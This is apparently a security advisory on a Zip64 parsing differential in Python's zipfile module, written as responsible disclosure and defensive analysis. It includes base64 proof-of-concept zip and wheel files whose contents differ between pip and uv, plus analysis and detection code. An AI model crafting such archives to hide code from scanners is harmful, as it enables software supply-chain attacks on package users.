Summary
It is possible to craft a zip file that Python's zipfile implementation parses differently from other common zip implementations, so that the two return different contents. This works because Python ignores the offset stored in the Zip64 locator record and instead expects the Zip64 end-of-central-directory record to sit immediately before the Zip64 locator record. As a result, an archive can contain two Zip64 end-of-central-directory records: one pointed to by the offset in the Zip64 locator record, which most implementations read, and one placed immediately before the Zip64 locator record, which Python reads.
Exploitation requires user interaction. An attack using this technique requires different zip parsing implementations to be used at different stages of handling the same zip file, for example a Python wheel file that is installed with "uv" at one stage and processed with Python's zipfile (as pip does) at another.
Severity
Moderate - This vulnerability can be leveraged to hide malicious content that evades detection.
Proof of Concept
Single File Zip
The following base64-encoded string is a specially crafted zip file that serves as a simple proof of concept.
$ echo "UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA" | base64 -d > poc.zip
When unzipped with Python, a file called py_file with the contents "is python" is returned.
When unzipped with other zip implementations, a file called boring_file with the contents "not python" is returned.
Extracting with Python:
$ mkdir ~/py && cd ~/py
$ python3 -c "import zipfile; zipfile.ZipFile('../poc.zip').extractall()"
$ ls
py_file
$ cat py_file
is python
Extracting with unzip (InfoZip):
$ mkdir ~/unzip && cd ~/unzip
$ unzip ../poc.zip
Archive: ../poc.zip
extracting: boring_file
$ cat boring_file
not python
Implementations that output boring_file include:
- Go
- java.util.zip (seek and streaming)
- InfoZip (unzip)
- MiniZip (zlib)
- PHP
- zip + async_zip Rust crates (seek and streaming)
- Yauzl (npm)
- net.lingala.zip4j (Maven)
- libarchive (bsdunzip)
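For comparison, the following is a minimal Python sketch of how a parser that honours the Zip64 locator offset finds the central directory. It is not taken from any of the implementations listed above. The function name names_via_locator and the format-string constants are assumptions made for illustration, and the sketch ignores prepended data, multi-disk archives, and filename encoding flags, and assumes the last end-of-central-directory signature in the file is the real one.

```python
import struct

# Record layouts per the ZIP format; the constant names are illustrative.
LOCATOR_FMT = "<4sLQL"      # signature, disk number, zip64 EOCD offset, total disks
EOCD64_FMT = "<4sQ2H2L4Q"   # fixed part of the zip64 end-of-central-directory record
CDIR_FMT = "<4s6H3L5H2L"    # fixed part of a central directory file header


def names_via_locator(data: bytes) -> list:
    """List entry names by following the offset stored in the zip64 locator."""
    eocd_pos = data.rfind(b"PK\x05\x06")
    loc_pos = eocd_pos - struct.calcsize(LOCATOR_FMT)
    if eocd_pos < 0 or loc_pos < 0:
        raise ValueError("no zip64 locator found")
    sig, _disk, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, loc_pos)
    if sig != b"PK\x06\x07":
        raise ValueError("no zip64 locator found")

    # Follow reloff rather than assuming the record sits next to the locator.
    eocd64 = struct.unpack_from(EOCD64_FMT, data, reloff)
    if eocd64[0] != b"PK\x06\x06":
        raise ValueError("locator does not point at a zip64 EOCD record")
    total_entries, cd_offset = eocd64[7], eocd64[9]

    names = []
    pos = cd_offset
    for _ in range(total_entries):
        header = struct.unpack_from(CDIR_FMT, data, pos)
        if header[0] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        name_len, extra_len, comment_len = header[10], header[11], header[12]
        start = pos + struct.calcsize(CDIR_FMT)
        # Simplification: decode as UTF-8 regardless of the entry's flag bits.
        names.append(data[start:start + name_len].decode("utf-8", "replace"))
        pos = start + name_len + extra_len + comment_len
    return names
```

Run against the bytes of poc.zip, this approach would be expected to list boring_file rather than py_file, matching the behaviour reported for the implementations above.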
Wheel
The following base64-encoded string is a specially crafted wheel file that further demonstrates the flaw and a potential attack scenario.
$ echo "UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYz
NmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=" | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing with uv:
$ mkdir uv && cd uv
$ uv venv env
$ . env/bin/activate
$ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Using Python 3.12.3 environment at: env
Resolved 1 package in 3ms
Installed 1 package in 1ms
+ cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl)
$ python3 -c 'import cbwheelzip64'
magic
Installing with pip:
$ mkdir py && cd py
$ python3 -m venv env
$ . env/bin/activate
$ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing collected packages: cbwheelzip64
Successfully installed cbwheelzip64-0.0.1
$ python3 -c 'import cbwheelzip64'
more magic!
Further Analysis
# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8
# Simplified implementation, removing conditions and error handling.
def _EndRecData64(fpin, offset, endrec):
    fpin.seek(offset - sizeEndCentDir64Locator, 2)
    data = fpin.read(sizeEndCentDir64Locator)
    sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
    # Assume no 'zip64 extensible data'
    fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
    data = fpin.read(sizeEndCentDir64)
    # ...
The above code snippet is the current logic used to read the zip64 end-of-central-directory record.
sizeEndCentDir64Locator and sizeEndCentDir64 are both constants computed with struct.calcsize when the module is imported.
When reading the zip64 end-of-central-directory record, the offset stored in the zip64 locator record (reloff) is ignored entirely, and the position of the record is instead calculated from the record size constants.
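The fixed-offset arithmetic can be sketched as follows. The format strings are assumed to match the ones used in CPython's zipfile module, and the constant and function names (LOCATOR_SIZE, EOCD64_SIZE, EOCD_SIZE, fixed_offset_position) are illustrative rather than CPython's own. The sketch also assumes an archive with no trailing comment, so the end-of-central-directory record occupies the last 22 bytes of the file.

```python
import io
import struct

# Sizes of the fixed-length records, derived the same way as in the snippet above.
LOCATOR_SIZE = struct.calcsize("<4sLQL")     # zip64 locator: 20 bytes
EOCD64_SIZE = struct.calcsize("<4sQ2H2L4Q")  # zip64 EOCD, fixed part: 56 bytes
EOCD_SIZE = struct.calcsize("<4s4H2LH")      # classic EOCD, no comment: 22 bytes


def fixed_offset_position(fp, eocd_offset_from_end):
    """Return the absolute position a fixed-offset reader seeks to.

    eocd_offset_from_end is negative, e.g. -EOCD_SIZE when there is no comment.
    The locator's reloff value plays no part in this calculation.
    """
    fp.seek(eocd_offset_from_end - LOCATOR_SIZE - EOCD64_SIZE, 2)
    return fp.tell()


# With no comment, the record is always read 22 + 20 + 56 = 98 bytes from the end.
fp = io.BytesIO(bytes(200))
print(fixed_offset_position(fp, -EOCD_SIZE))  # 102
```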
The comment "Assume no 'zip64 extensible data'" seems to suggest this "fixed offset" behaviour is intentional, as reading the "zip64 extensible data" field would require treating the zip64 end-of-central-directory record as having a variable size.
However, by making this assumption, Python's zip implementation differs from the majority of other implementations, which do use the offset from the zip64 locator record.
Finally, the assumption of no extensible data is not validated. reloff is not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means that reloff can point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.
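One way such a check could look is sketched below. This is an illustration of the missing validation, not the fix adopted by CPython. The function name zip64_offsets is hypothetical, and the sketch assumes no data is prepended to the archive, no zip64 extensible data is present, and the last end-of-central-directory signature in the file is the real one.

```python
import struct

LOCATOR_FMT = "<4sLQL"  # signature, disk number, reloff, total disks
LOCATOR_SIZE = struct.calcsize(LOCATOR_FMT)  # 20
EOCD64_FIXED_SIZE = 56  # zip64 EOCD record without extensible data


def zip64_offsets(data: bytes):
    """Return (reloff, adjacent_pos) for a zip64 archive, or None if not zip64.

    reloff is the offset stored in the zip64 locator; adjacent_pos is where a
    fixed-offset reader would look for the zip64 EOCD record. If the two
    differ, different parsers may read different records.
    """
    eocd_pos = data.rfind(b"PK\x05\x06")
    if eocd_pos < LOCATOR_SIZE:
        return None
    loc_pos = eocd_pos - LOCATOR_SIZE
    sig, _diskno, reloff, _disks = struct.unpack_from(LOCATOR_FMT, data, loc_pos)
    if sig != b"PK\x06\x07":
        return None  # no zip64 locator immediately before the EOCD record
    return reloff, loc_pos - EOCD64_FIXED_SIZE


def is_ambiguous(data: bytes) -> bool:
    """True when the locator offset disagrees with the adjacent position."""
    offsets = zip64_offsets(data)
    return offsets is not None and offsets[0] != offsets[1]
```

A scanner or installer could reject any archive for which is_ambiguous returns True; for the proof-of-concept files above, the two positions would be expected to differ.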
Timeline
Date reported: 07/28/2025
Date fixed:
Date disclosed: 10/27/2026